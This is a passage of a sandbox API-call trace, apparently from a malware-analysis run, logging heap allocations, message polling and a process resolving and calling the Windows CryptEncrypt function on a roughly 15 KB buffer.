[0230.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3baa) returned 0x3bf0dd8 [0230.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f020 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3baa) returned 0x2f14818 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0230.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.898] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3baa) returned 0x3bf0dd8 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0230.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.899] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0230.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.901] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.901] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0230.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0230.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0230.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0230.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0230.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.903] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f620 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0230.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0230.903] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3baa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3bb0) returned 1 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0230.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0230.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0230.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0230.908] CharLowerBuffW (in: lpsz="byte[15280]", cchLength=0xb | out: lpsz="byte[15280]") returned 0xb [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0230.910] RtlAllocateHeap 